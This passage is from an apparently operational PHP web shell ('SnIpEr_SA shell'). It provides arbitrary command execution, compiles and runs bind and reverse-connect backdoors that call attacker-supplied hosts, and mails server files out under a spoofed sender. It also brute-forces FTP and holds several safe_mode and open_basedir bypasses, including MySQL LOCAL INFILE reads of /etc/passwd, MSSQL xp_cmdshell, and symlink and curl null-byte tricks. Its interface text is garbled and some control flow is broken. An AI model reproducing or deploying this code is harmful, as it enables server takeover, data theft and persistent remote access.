3838 echo "????? ???? ??? ??: <b>".@phpversion()."</b>";
3839 $curl_on = @function_exists('curl_version');
3840 echo ws(2);
3841 echo "??????: <b>".(($curl_on)?("<font color=#008000>????</font>"):("<font color=red>??? ????</font>"));
3842 echo "</b>".ws(2);
3843 echo "??? ???: <b>";
3844 $mysql_on = @function_exists('mysql_connect');
3845 if($mysql_on){
3846 echo "<font color=#008000>????</font>"; } else { echo "<font color=red>??? ????</font>"; }
3847 echo "</b>".ws(2);
3848 echo "?? ?? ???: <b>";
3849 $mssql_on = @function_exists('mssql_connect');
3850 if($mssql_on){echo "<font color=#008000>????</font>";}else{echo "<font color=red>??? ????</font>";}
3851 echo "</b>".ws(2);
3852 echo "???? ??? ???: <b>";
3853 $pg_on = @function_exists('pg_connect');
3854 if($pg_on){echo "<font color=#008000>????</font>";}else{echo "<font color=red>??? ????</font>";}
3855 echo "</b>".ws(2);
3856 echo "??????: <b>";
3857 $ora_on = @function_exists('ocilogon');
3858 if($ora_on){echo "<font color=#008000>????</font>";}else{echo "<font color=red>????</font>";}
3859 echo "</b><br>".ws(2);
3860 echo "?????? ???????? : <b>";
3861 if(''==($df=@ini_get('disable_functions'))){echo "<font color=#00800F>??????</font></b>";}else{echo "<font color=red>$df</font></b>";}
3862 $free = @diskfreespace($dir);
3863 if (!$free) {$free = 0;}
3864 $all = @disk_total_space($dir);
3865 if (!$all) {$all = 0;}
3866 echo "<br>".ws(2)."??????? ??????? : <b>".view_size($free)."</b> ??????? ??????: <b>".view_size($all)."</b>";
3867 echo "</b><br>".ws(2);
3868 echo "Register globals: <b>";
3869 $reg_g = @ini_get("register_globals");
3870 if($reg_g){
3871 echo "<font color=#008000>????</font>"; } else { echo "<font color=red>??? ????</font>"; }
3872 echo "</b>".ws(2);
3873 echo "open_basedir: <b>";
3874 $openbasedi = @ini_get("open_basedir");
3875 if($openbasedi){
3876 echo "<font color=red>????</font>"; } else { echo "<font color=#008000>??? ????</font>"; }
3877 echo "</b>".ws(2);
3878 echo '</font></td></tr><table>
3879 <table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc>
3880 <tr><td align=right width=100>';
3881 echo $font;
3882 if($unix){
3883 echo '<font color=#990000><b>uname -a :'.ws(1).'<br>sysctl :'.ws(1).'<br>$OSTYPE :'.ws(1).'<br>Server :'.ws(1).'<br>id :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
3884 echo "</td><td>";
3885 echo "<font face=tahoma size=-2 color=#cccccc><b>";
3886 echo((!empty($uname))?(ws(3).@substr($uname,0,120)."<br>"):(ws(3).@substr(@php_uname(),0,120)."<br>"));
3887 echo ws(3).$sysctl."<br>";
3888 echo ws(3).ex('echo $OSTYPE')."<br>";
3889 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
3890 if(!empty($id)) { echo ws(3).$id."<br>"; }
3891 else if(function_exists('posix_geteuid') && function_exists('posix_getegid') && function_exists('posix_getgrgid') && function_exists('posix_getpwuid'))
3892  {
3893  $euserinfo  = @posix_getpwuid(@posix_geteuid());
3894  $egroupinfo = @posix_getgrgid(@posix_getegid());
3895  echo ws(3).'uid='.$euserinfo['uid'].' ( '.$euserinfo['name'].' ) gid='.$egroupinfo['gid'].' ( '.$egroupinfo['name'].' )<br>';
3896  }
3897 else echo ws(3)."user=".@get_current_user()." uid=".@getmyuid()." gid=".@getmygid()."<br>";
3898 echo ws(3).$dir;
3899 echo ws(3).'( '.perms(@fileperms($dir)).' )';
3900 echo "<br>";
3901 echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
3902 echo "</b></font>";
3903 }
3904 else
3905 {
3906 echo '<font color=blue><b>OS :'.ws(1).'<br>Server :'.ws(1).'<br>User :'.ws(1).'<br>pwd :'.ws(1).'<br>ip :'.ws(1).'</b></font><br>';
3907 echo "</td><td>";
3908 echo "<font face=tahoma size=-2 color=red><b>";
3909 echo ws(3).@substr(@php_uname(),0,120)."<br>";
3910 echo ws(3).@substr($SERVER_SOFTWARE,0,120)."<br>";
3911 echo ws(3).@getenv("USERNAME")."<br>";
3912 echo ws(3).$dir;
3913 echo "<br>";
3914 echo ws(3)."<b>Your ip: <a href=http://".$_SERVER["REMOTE_ADDR"].">".$_SERVER["REMOTE_ADDR"]."</a> - Server ip: <a href=http://".gethostbyname($_SERVER["HTTP_HOST"]).">".gethostbyname($_SERVER["HTTP_HOST"])."</a></b><br/>";
3915 echo "<br></font>";
3916 }
3917 echo "</font>";
3918 echo "</td></tr></table>";
3919 if(!empty($_POST['cmd']) && $_POST['cmd']=="mail")
3920  {
3921  $res = mail($_POST['to'],$_POST['subj'],$_POST['text'],"From: ".$_POST['from']."\r\n");
3922  err(6+$res);
3923  $_POST['cmd']="";
3924  }
3925 if(!empty($_POST['cmd']) && $_POST['cmd']=="mail_file" && !empty($_POST['loc_file']))
3926  {
3927  if(!$file=@fopen($_POST['loc_file'],"r")) { err(1,$_POST['loc_file']); $_POST['cmd']=""; }
3928  else
3929   {
3930     $filename = @basename($_POST['loc_file']);
3931     $filedump = @fread($file,@filesize($_POST['loc_file']));
3932     fclose($file);
3933     $content_encoding=$mime_type='';
3934     compress($filename,$filedump,$_POST['compress']);
3935     $attach = array(
3936                     "name"=>$filename,
3937                     "type"=>$mime_type,
3938                     "content"=>$filedump
3939                    );
3940     if(empty($_POST['subj'])) { $_POST['subj'] = 'file from SnIpEr_SA shell'; }
3941     if(empty($_POST['from'])) { $_POST['from'] = 'billy@microsoft.com'; }
3942     $res = mailattach($_POST['to'],$_POST['from'],$_POST['subj'],$attach);
3943     err(6+$res);
3944     $_POST['cmd']="";
3945   }
3946  }
3947 if(!empty($_POST['cmd']) && $_POST['cmd'] == "find_text")
3948 {
3949 $_POST['cmd'] = 'find '.$_POST['s_dir'].' -name \''.$_POST['s_mask'].'\' | xargs grep -E \''.$_POST['s_text'].'\'';
3950 }
3951 if(!empty($_POST['cmd']) && $_POST['cmd']=="ch_")
3952  {
3953  switch($_POST['what'])
3954    {
3955    case 'own':
3956    @chown($_POST['param1'],$_POST['param2']);
3957    break;
3958    case 'grp':
3959    @chgrp($_POST['param1'],$_POST['param2']);
3960    break;
3961    case 'mod':
3962    @chmod($_POST['param1'],intval($_POST['param2'], 8));
3963    break;
3964    }
3965  $_POST['cmd']="";
3966  }
3967 if(!empty($_POST['cmd']) && $_POST['cmd']=="mk")
3968  {
3969    switch($_POST['what'])
3970    {
3971      case 'file':
3972       if($_POST['action'] == "create")
3973        {
3974        if(file_exists($_POST['mk_name']) || !$file=@fopen($_POST['mk_name'],"w")) { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
3975        else {
3976         fclose($file);
3977         $_POST['e_name'] = $_POST['mk_name'];
3978         $_POST['cmd']="edit_file";
3979         echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text61']."</b></font></div></td></tr></table>";
3980         }
3981        }
3982        else if($_POST['action'] == "delete")
3983        {
3984        if(unlink($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text63']."</b></font></div></td></tr></table>";
3985        $_POST['cmd']="";
3986        }
3987      break;
3988      case 'dir':
3989       if($_POST['action'] == "create"){
3990       if(mkdir($_POST['mk_name']))
3991        {
3992          $_POST['cmd']="";
3993          echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text62']."</b></font></div></td></tr></table>";
3994        }
3995       else { err(2,$_POST['mk_name']); $_POST['cmd']=""; }
3996       }
3997       else if($_POST['action'] == "delete"){
3998       if(rmdir($_POST['mk_name'])) echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text64']."</b></font></div></td></tr></table>";
3999       $_POST['cmd']="";
4000       }
4001      break;
4002    }
4003  }
4004 if(!empty($_POST['cmd']) && $_POST['cmd']=="edit_file" && !empty($_POST['e_name']))
4005  {
4006  if(!$file=@fopen($_POST['e_name'],"r+")) { $only_read = 1; @fclose($file); }
4007  if(!$file=@fopen($_POST['e_name'],"r")) { err(1,$_POST['e_name']); $_POST['cmd']=""; }
4008  else {
4009  echo $table_up3;
4010  echo $font;
4011  echo "<form name=save_file method=post>";
4012  echo ws(3)."<b>".$_POST['e_name']."</b>";
4013  echo "<div align=center><textarea name=e_text cols=121 rows=24>";
4014  echo @htmlspecialchars(@fread($file,@filesize($_POST['e_name'])));
4015  fclose($file);
4016  echo "</textarea>";
4017  echo "<input type=hidden name=e_name value=".$_POST['e_name'].">";
4018  echo "<input type=hidden name=dir value=".$dir.">";
4019  echo "<input type=hidden name=cmd value=save_file>";
4020  echo (!empty($only_read)?("<br><br>".$lang[$language.'_text44']):("<br><br><input type=submit name=submit value=\" ".$lang[$language.'_butt10']." \">"));
4021  echo "</div>";
4022  echo "</font>";
4023  echo "</form>";
4024  echo "</td></tr></table>";
4025  exit();
4026  }
4027  }
4028 if(!empty($_POST['cmd']) && $_POST['cmd']=="save_file")
4029  {
4030  $mtime = @filemtime($_POST['e_name']);
4031  if(!$file=@fopen($_POST['e_name'],"w")) { err(0,$_POST['e_name']); }
4032  else {
4033  if($unix) $_POST['e_text']=@str_replace("\r\n","\n",$_POST['e_text']);
4034  @fwrite($file,$_POST['e_text']);
4035  @touch($_POST['e_name'],$mtime,$mtime);
4036  $_POST['cmd']="";
4037  echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><div align=center><font face=tahoma size=-2><b>".$lang[$language.'_text45']."</b></font></div></td></tr></table>";
4038  }
4039  }
4040 
4041 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="C"))
4042 {
4043  cf("/tmp/bd.c",$port_bind_bd_c);
4044  $blah = ex("gcc -o /tmp/bd /tmp/bd.c");
4045  @unlink("/tmp/bd.c");
4046  $blah = ex("/tmp/bd ".$_POST['port']." ".$_POST['bind_pass']." &");
4047  $_POST['cmd']="ps -aux | grep bd";
4048 $_POST['cmd']="echo \"Now try connect to nc -vv ".gethostbyname($_SERVER["HTTP_HOST"])." port ".$_POST['port']." ...\"";
4049 }
4050 if (!empty($_POST['port1']))
4051 {
4052  cf("bds",$port_bind_bd_cs);
4053  $blah = ex("chmod 777 bds");
4054  $blah = ex("./bds ".$_POST['port1']." &");
4055  $_POST['cmd']="echo \"Now script install backdoor connect to port ";
4056   }else{
4057 cf("/tmp/bds",$port_bind_bd_cs);
4058  $blah = ex("chmod 777 bds");
4059  $blah = ex("./tmp/bds ".$_POST['port1']." &");
4060  }
4061 if (!empty($_POST['php_ini1']))
4062 {
4063  cf("php.ini",$php_ini1);
4064   $_POST['cmd']=" ?????? ????? ??? php.ini ?? ??? ???";
4065  }
4066  if (!empty($_POST['htacces']))
4067 {
4068  cf(".htaccess",$htacces);
4069   $_POST['cmd']="?????? ????? ??????? htaccess ?? ??? ???";
4070  }
4071   if (!empty($_POST['file_ini']))
4072 {
4073  cf("ini.php",$sni_res);
4074   $_POST['cmd']=" http://target.com/ini.php?ss=http://shell.txt? ??????? ss ???????? ini.php ???? ?? ???? ?????? ????";
4075  }
4076 if(($_POST['fileto'] != "")||($_POST['filefrom'] != ""))
4077 {
4078 $data = implode("", file($_POST['filefrom']));
4079 $fp = fopen($_POST['fileto'], "wb");
4080 fputs($fp, $data);
4081 $ok = fclose($fp);
4082 if($ok)
4083 {
4084 $size = filesize($_POST['fileto'])/1024;
4085 $sizef = sprintf("%.2f", $size);
4086 print "<center><div id=logostrip>Download - OK.
4087 (".$sizef."ê?)</div></center>";
4088 }
4089 else
4090 {
4091 print "<center><div id=logostrip>Something is wrong. Download - IS NOT
4092 OK</div></center>";
4093 }
4094 }
4095 if (!empty($_POST['port'])&&!empty($_POST['bind_pass'])&&($_POST['use']=="Perl"))
4096 {
4097  cf("/tmp/bdpl",$port_bind_bd_pl);
4098  $p2=which("perl");
4099  $blah = ex($p2." /tmp/bdpl ".$_POST['port']." &");
4100  $_POST['cmd']="ps -aux | grep bdpl";
4101  $_POST['cmd']="echo \"Now try connect to nc -vv ".gethostbyname($_SERVER["HTTP_HOST"])." port ".$_POST['port']." ...\"";
4102 }
4103 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="Perl"))
4104 {
4105  cf("/tmp/back",$back_connect);
4106  $p2=which("perl");
4107  $blah = ex($p2." /tmp/back ".$_POST['ip']." ".$_POST['port']." &");
4108  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...Datached\"";
4109 }
4110 if (!empty($_POST['ips']) && !empty($_POST['ports']))
4111 {
4112  cf("/tmp/backs",$back_connects);
4113  $p2=which("perl");
4114  $blah = ex($p2." /tmp/backs ".$_POST['ips']." ".$_POST['ports']." &");
4115  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ips']." port ".$_POST['ports']." ...\"";
4116 }
4117 if (!empty($_POST['ip']) && !empty($_POST['port']) && ($_POST['use']=="C"))
4118 {
4119  cf("/tmp/back.c",$back_connect_c);
4120  $blah = ex("gcc -o /tmp/backc /tmp/back.c");
4121  @unlink("/tmp/back.c");
4122  $blah = ex("/tmp/backc ".$_POST['ip']." ".$_POST['port']." &");
4123  $_POST['cmd']="echo \"Now script try connect to ".$_POST['ip']." port ".$_POST['port']." ...\"";
4124 }
4125 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="Perl"))
4126 {
4127  cf("/tmp/dp",$datapipe_pl);
4128  $p2=which("perl");
4129  $blah = ex($p2." /tmp/dp ".$_POST['local_port']." ".$_POST['remote_host']." ".$_POST['remote_port']." &");
4130  $_POST['cmd']="ps -aux | grep dp";
4131 }
4132 if (!empty($_POST['local_port']) && !empty($_POST['remote_host']) && !empty($_POST['remote_port']) && ($_POST['use']=="C"))
4133 {
4134  cf("/tmp/dpc.c",$datapipe_c);
4135  $blah = ex("gcc -o /tmp/dpc /tmp/dpc.c");
4136  @unlink("/tmp/dpc.c");
4137  $blah = ex("/tmp/dpc ".$_POST['local_port']." ".$_POST['remote_port']." ".$_POST['remote_host']." &");
4138  $_POST['cmd']="ps -aux | grep dpc";
4139 }
4140 if (!empty($_POST['alias']) && isset($aliases[$_POST['alias']])) { $_POST['cmd'] = $aliases[$_POST['alias']]; }
4141 if (!empty($HTTP_POST_FILES['userfile']['name']))
4142 {
4143 if(!empty($_POST['new_name'])) { $nfn = $_POST['new_name']; }
4144 else { $nfn = $HTTP_POST_FILES['userfile']['name']; }
4145 @copy($HTTP_POST_FILES['userfile']['tmp_name'],
4146             $_POST['dir']."/".$nfn)
4147       or print("<font color=red face=Fixedsys><div align=center>Error uploading file ".$HTTP_POST_FILES['userfile']['name']."</div></font>");
4148 }
4149 if (!empty($_POST['with']) && !empty($_POST['rem_file']) && !empty($_POST['loc_file']))
4150 {
4151  switch($_POST['with'])
4152  {
4153  case wget:
4154  $_POST['cmd'] = which('wget')." ".$_POST['rem_file']." -O ".$_POST['loc_file']."";
4155  break;
4156  case fetch:
4157  $_POST['cmd'] = which('fetch')." -o ".$_POST['loc_file']." -p ".$_POST['rem_file']."";
4158  break;
4159  case lynx:
4160  $_POST['cmd'] = which('lynx')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
4161  break;
4162  case links:
4163  $_POST['cmd'] = which('links')." -source ".$_POST['rem_file']." > ".$_POST['loc_file']."";
4164  break;
4165  case GET:
4166  $_POST['cmd'] = which('GET')." ".$_POST['rem_file']." > ".$_POST['loc_file']."";
4167  break;
4168  case curl:
4169  $_POST['cmd'] = which('curl')." ".$_POST['rem_file']." -o ".$_POST['loc_file']."";
4170  break;
4171  }
4172 }
4173 if(!empty($_POST['cmd']) && ($_POST['cmd']=="ftp_file_up" || $_POST['cmd']=="ftp_file_down"))
4174  {
4175  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
4176  if(empty($ftp_port)) { $ftp_port = 21; }
4177  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
4178  if(!$connection) { err(3); }
4179  else
4180   {
4181   if(!@ftp_login($connection,$_POST['ftp_login'],$_POST['ftp_password'])) { err(4); }
4182   else
4183    {
4184    if($_POST['cmd']=="ftp_file_down") { if(chop($_POST['loc_file'])==$dir) { $_POST['loc_file']=$dir.((!$unix)?('\\'):('/')).basename($_POST['ftp_file']); } @ftp_get($connection,$_POST['loc_file'],$_POST['ftp_file'],$_POST['mode']);        }
4185    if($_POST['cmd']=="ftp_file_up")   { @ftp_put($connection,$_POST['ftp_file'],$_POST['loc_file'],$_POST['mode']);        }
4186    }
4187   }
4188  @ftp_close($connection);
4189  $_POST['cmd'] = "";
4190  }
4191 if(!empty($_POST['cmd']) && $_POST['cmd']=="ftp_brute")
4192  {
4193  list($ftp_server,$ftp_port) = split(":",$_POST['ftp_server_port']);
4194  if(empty($ftp_port)) { $ftp_port = 21; }
4195  $connection = @ftp_connect ($ftp_server,$ftp_port,10);
4196  if(!$connection) { err(3); $_POST['cmd'] = ""; }
4197  else if(!$users=get_users()) { echo "<table width=100% cellpadding=0 cellspacing=0 bgcolor=#cccccc><tr><td bgcolor=#000000><font color=red face=tahoma size=-2><div align=center><b>".$lang[$language.'_text96']."</b></div></font></td></tr></table>"; $_POST['cmd'] = ""; }
4198  @ftp_close($connection);
4199  }
4200 echo $table_up3;
4201 if (empty($_POST['cmd'])&&!$safe_mode) { $_POST['cmd']=(!$unix)?("dir"):("ls -lia"); }
4202 else if(empty($_POST['cmd'])&&$safe_mode){ $_POST['cmd']="safe_dir"; }
4203 echo $font.$lang[$language.'_text1'].": <b>".$_POST['cmd']."</b></font></td></tr><tr><td><b><div align=center><textarea name=report cols=121 rows=15>";
4204 
4205 
4206 if ($method=="file") {
4207                         if (@file($file)) {
4208                                 $filer = file($file);
4209                                 foreach ($filer as $a) { echo $a; }
4210                         } else {
4211                                 echo "<script> alert(\"unable to read file: $file using: file\"); </script>";
4212                         }
4213                 }
4214                 if ($method=="fread") {
4215                         if (@fopen($file, 'r')) {
4216                                 $fp = fopen($file, 'r');
4217                                 $string = fread($fp, filesize($file));
4218                                 echo "<pre>";
4219                                 echo $string;
4220                                 echo "</pre>";
4221                         } else {
4222                                 echo "<script> alert(\"unable to read file: $file using: fread\"); </script>";
4223                         }
4224                 }
4225                 if ($method=="show_source") {
4226                         if (show_source($file)) {
4227                                 echo "<pre>";
4228                                 echo show_source($file);
4229                                 echo "</pre>";
4230                         } else {
4231                                 echo "<script> alert(\"unable to read file: $file using: show_source\"); </script>";
4232                         }
4233                 }
4234                 if ($method=="readfile") {
4235                         echo "<pre>";
4236                         if (readfile($file)) {
4237                                 //echo "<pre>";
4238                                 //echo readfile($file);
4239                                 echo "</pre>";
4240                         } else {
4241                                 echo "</pre>";
4242                                 echo "<script> alert(\"unable to read file: $file using: readfile\"); </script>";
4243                         }
4244                 }
4245 function dozip1($link,$file)
4246 {
4247    $fp = @fopen($link,"r");
4248    while(!feof($fp))
4249    {
4250        $cont.= fread($fp,1024);
4251    }
4252    fclose($fp);
4253    $fp2 = @fopen($file,"w");
4254    fwrite($fp2,$cont);
4255    fclose($fp2);
4256 }
4257 if (isset($_POST['funzip']))
4258 {
4259 dozip1($_POST['funzip'],$_POST['fzip']);
4260 }
4261 if(empty($_POST['root'])){
4262 } else {
4263    $root = $_POST['root']; }
4264 
4265 
4266   $c = 0; $D = array();
4267   set_error_handler("eh");
4268   $chars = "_-.01234567890abcdefghijklnmopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ";
4269   for($i=0; $i < strlen($chars); $i++){
4270   $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}";
4271   $prevD = $D[count($D)-1];
4272   glob($path."*");
4273         if($D[count($D)-1] != $prevD){
4274         for($j=0; $j < strlen($chars); $j++){
4275            $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}";
4276            $prevD2 = $D[count($D)-1];
4277            glob($path."*");
4278               if($D[count($D)-1] != $prevD2){
4279 
4280                  for($p=0; $p < strlen($chars); $p++){
4281                  $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}";
4282                  $prevD3 = $D[count($D)-1];
4283                  glob($path."*");
4284                     if($D[count($D)-1] != $prevD3){
4285 
4286                        for($r=0; $r < strlen($chars); $r++){
4287                        $path ="{$root}".((substr($root,-1)!="/") ? "/" : NULL)."{$chars[$i]}{$chars[$j]}{$chars[$p]}{$chars[$r]}";
4288                        glob($path."*");
4289                        }
4290                     }
4291                  }
4292               }
4293         }
4294         }
4295   }
4296   $D = array_unique($D);
4297 
4298 
4299   foreach($D as $item)
4300   if(isset($_REQUEST['root']))
4301   echo "{$item}\n";
4302 
4303 
4304   function eh($errno, $errstr, $errfile, $errline){
4305      global $D, $c, $i;
4306      preg_match("/SAFE\ MODE\ Restriction\ in\ effect\..*whose\ uid\ is(.*)is\ not\ allowed\ to\ access(.*)owned by uid(.*)/", $errstr, $o);
4307      if($o){ $D[$c] = $o[2]; $c++;}
4308   }
4309 
4310 
4311 if($safe_mode)
4312 {
4313  switch($_POST['cmd'])
4314  {
4315  case 'safe_dir':
4316   $d=@dir($dir);
4317   if ($d)
4318    {
4319    while (false!==($file=$d->read()))
4320     {
4321      if ($file=="." || $file=="..") continue;
4322      @clearstatcache();
4323      list ($dev, $inode, $inodep, $nlink, $uid, $gid, $inodev, $size, $atime, $mtime, $ctime, $bsize) = stat($file);
4324      if(!$unix){
4325      echo date("d.m.Y H:i",$mtime);
4326      if(@is_dir($file)) echo "  <DIR> "; else printf("% 7s ",$size);
4327      }
4328      else{
4329      $owner = @posix_getpwuid($uid);
4330      $grgid = @posix_getgrgid($gid);
4331      echo $inode." ";
4332      echo perms(@fileperms($file));
4333      printf("% 4d % 9s % 9s %7s ",$nlink,$owner['name'],$grgid['name'],$size);
4334      echo date("d.m.Y H:i ",$mtime);
4335      }
4336      echo "$file\n";
4337     }
4338    $d->close();
4339    }
4340   else echo $lang[$language._text29];
4341  break;
4342     }
4343 }
4344 else if(($_POST['cmd']!="php_eval")&&($_POST['cmd']!="mysql_dump")&&($_POST['cmd']!="db_query")&&($_POST['cmd']!="ftp_brute")){
4345  $cmd_rep = ex($_POST['cmd']);
4346  if(!$unix) { echo @htmlspecialchars(@convert_cyr_string($cmd_rep,'d','w'))."\n"; }
4347  else { echo @htmlspecialchars($cmd_rep)."\n"; }}
4348  if($_POST['cmd'])
4349 {
4350  switch($_POST['cmd'])
4351  {
4352   case 'test1':
4353   $ci = @curl_init("file://".$_POST['test1_file']."");
4354   $cf = @curl_exec($ci);
4355   echo $cf;
4356   break;
4357   case 'test2':
4358   @include($_POST['test2_file']);
4359   break;
4360   case 'mysqlb':
4361 $mhost = "localhost";
4362 $muser = $_POST['test3_ml'];
4363 $mpass = $_POST['test3_mp'];
4364 $mdb   = $_POST['test3_md'];
4365 $file = $_POST['test3_file'];
4366 // default mysql_read files [seperated by: ':']:
4367 $mysql_files_str = "/etc/passwd:/proc/cpuinfo:/etc/resolv.conf:/etc/proftpd.conf";
4368 $mysql_files = explode(':', $mysql_files_str);
4369 
4370                                                                 $sql = array (
4371                                                                    "USE $mdb",
4372                                                                    'CREATE TEMPORARY TABLE ' . ($tbl = 'A'.time ()) . ' (a LONGBLOB)',
4373                                                                    "LOAD DATA LOCAL INFILE '$file' INTO TABLE $tbl FIELDS "
4374                                                                    . "TERMINATED BY       '__THIS_NEVER_HAPPENS__' "
4375                                                                    . "ESCAPED BY          '' "
4376                                                                    . "LINES TERMINATED BY '__THIS_NEVER_HAPPENS__'",
4377                                                                    "SELECT a FROM $tbl LIMIT 1"
4378                                                                 );
4379 
4380                                                                 mysql_connect ($mhost, $muser, $mpass);
4381                                                                 foreach ($sql as $statement) {
4382                                                                    $q = mysql_query ($statement);
4383                                                                    if ($q == false) die (
4384                                                                       "FAILED: " . $statement . "\n" .
4385                                                                       "REASON: " . mysql_error () . "\n"
4386                                                                    );
4387                                                                    if (! $r = @mysql_fetch_array ($q, MYSQL_NUM)) continue;
4388                                                                    echo htmlspecialchars($r[0]);
4389                                                                    mysql_free_result ($q);
4390                                                                 }
4391 
4392 echo "</textarea>";
4393  break;
4394   case 'test4':
4395   if(empty($_POST['test4_port'])) { $_POST['test4_port'] = "1433"; }
4396   $db = @mssql_connect('localhost,'.$_POST['test4_port'],$_POST['test4_ml'],$_POST['test4_mp']);
4397   if($db)
4398    {
4399    if(@mssql_select_db($_POST['test4_md'],$db))
4400     {
4401      @mssql_query("drop table SnIpEr_SA_temp_table",$db);
4402      @mssql_query("create table SnIpEr_SA_temp_table ( string VARCHAR (500) NULL)",$db);
4403      @mssql_query("insert into SnIpEr_SA_temp_table EXEC master.dbo.xp_cmdshell '".$_POST['test4_file']."'",$db);
4404      $res = mssql_query("select * from SnIpEr_SA_temp_table",$db);
4405      while(($row=@mssql_fetch_row($res)))
4406       {
4407       echo $row[0]."\r\n";
4408       }
4409     @mssql_query("drop table SnIpEr_SA_temp_table",$db);
4410     }
4411     else echo "[-] ERROR! Can't select database";
4412    @mssql_close($db);
4413    }
4414   else echo "[-] ERROR! Can't connect to MSSQL server";
4415   break;
4416   case 'test5':
4417   if (@file_exists('/tmp/mb_send_mail')) @unlink('/tmp/mb_send_mail');
4418   $extra = "-C ".$_POST['test5_file']." -X /tmp/mb_send_mail";
4419   @mb_send_mail(NULL, NULL, NULL, NULL, $extra);
4420   $lines = file ('/tmp/mb_send_mail');
4421   foreach ($lines as $line) { echo htmlspecialchars($line)."\r\n"; }
4422   break;
4423   case 'test6':
4424   $stream = @imap_open('/etc/passwd', "", "");
4425   $dir_list = @imap_list($stream, trim($_POST['test6_file']), "*");
4426   for ($i = 0; $i < count($dir_list); $i++) echo $dir_list[$i]."\r\n";
4427   @imap_close($stream);
4428   break;
4429   case 'test7':
4430   $stream = @imap_open($_POST['test7_file'], "", "");
4431   $str = @imap_body($stream, 1);
4432   echo $str;
4433   @imap_close($stream);
4434   break;
4435   case 'test8':
4436   if(@copy("compress.zlib://".$_POST['test8_file1'], $_POST['test8_file2'])) echo $lang[$language.'_text118'];
4437   else echo $lang[$language.'_text119'];
4438   break;
4439 case 'cURL':
4440    if(empty($_POST['SnIpEr_SA'])){
4441 
4442 } else {
4443 $curl=$_POST['SnIpEr_SA'];
4444 $ch =curl_init("file:///".$curl."\x00/../../../../../../../../../../../../".__FILE__);
4445 curl_exec($ch);
4446 var_dump(curl_exec($ch));
4447 echo "</textarea></CENTER>";
4448 }
4449 break;
4450 case 'copy':
4451 if(empty($snn)){
4452 if(empty($_GET['snn'])){
4453 if(empty($_POST['snn'])){
4454 } else {
4455 $u1p=$_POST['snn'];
4456 }
4457 } else {
4458 $u1p=$_GET['snn'];
4459 }
4460 }
4461   $u1p=""; // File to Include... or use _GET _POST
4462 $tymczas=""; // Set $tymczas to dir where you have 777 like /var/tmp
4463 
4464 $temp=tempnam($tymczas, "cx");
4465 if(copy("compress.zlib://".$snn, $temp)){
4466 $zrodlo = fopen($temp, "r");
4467 $tekst = fread($zrodlo, filesize($temp));
4468 fclose($zrodlo);
4469 echo "".htmlspecialchars($tekst)."";
4470 unlink($temp);
4471 echo "</textarea></CENTER>";
4472 }
4473 break;
4474 case 'ini_restore':
4475  if(empty($_POST['ini_restore'])){
4476 } else {
4477 $ini=$_POST['ini_restore'];
4478 echo ini_get("safe_mode");
4479 echo ini_get("open_basedir");
4480 require_once("$ini");
4481 ini_restore("safe_mode");
4482 ini_restore("open_basedir");
4483 echo ini_get("safe_mode");
4484 echo ini_get("open_basedir");
4485 include($_GET["ss"]);
4486 echo "</textarea></CENTER>";
4487 }
4488 break;
4489 case 'glob':
4490 function reg_glob()
4491 {
4492 $chemin=$_REQUEST['glob'];
4493 $files = glob("$chemin*");
4494 
4495 foreach ($files as $filename) {
4496    echo "$filename\n";
4497 }
4498 }
4499 if(isset($_REQUEST['glob']))
4500 {
4501 reg_glob();
4502 }
4503 break;
4504 case 'zend':
4505  if(empty($_POST['zend'])){
4506 } else {
4507 $dezend=$_POST['zend'];
4508 include($_POST['zend']);
4509 print_r($GLOBALS);
4510 require_once("$dezend");
4511 echo "</textarea></p>";
4512 }
4513 break;
4514   case 'sym1':
4515      if(empty($_POST['sym1p'])){
4516              } else {
4517 $symp=$_POST['sym1p'];
4518          }
4519      if(empty($_POST['sym1p2'])){
4520 } else {
4521 $symp2=$_POST['sym1p2'];
4522   symlink("a/a/a/a/a/a/", "dummy");
4523 symlink("dummy".$symp2."".$symp."", "xxx");
4524 unlink("dummy");
4525 while (1) {
4526 symlink(".", "dummy");
4527   }
4528  }
4529   break;
4530   case 'sym2':
4531   @include(xxx);
4532   break;
4533   case 'plugin':
4534   if ($_POST['plugin'] ){
4535 
4536                                            for($uid=0;$uid<60000;$uid++){   //cat /etc/passwd
4537                                         $ara = posix_getpwuid($uid);
4538                                                 if (!empty($ara)) {
4539                                                   while (list ($key, $val) = each($ara)){
4540                                                     print "$val:";
4541                                                   }
4542                                                   print "\n";
4543                                                 }
4544                                         }
4545                                  echo "</textarea>";
4546              }
4547         break;
4548         case 'command':
